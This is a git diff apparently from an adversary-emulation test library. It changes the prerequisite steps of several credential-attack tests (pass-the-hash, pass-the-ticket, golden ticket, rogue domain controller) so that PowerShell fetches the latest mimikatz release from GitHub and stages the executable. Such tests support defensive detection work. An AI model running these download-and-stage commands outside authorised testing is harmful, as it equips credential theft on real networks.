 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index c5ccbfba..74ce9a7e 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -88,7 +88,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md
index 14e71e5b..42f67bac 100644
--- a/atomics/T1550.002/T1550.002.md
+++ b/atomics/T1550.002/T1550.002.md
@@ -57,7 +57,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md
index b7dff150..34a582ab 100644
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -56,7 +56,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index e6e1d49f..e4bc6e21 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -107,7 +107,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force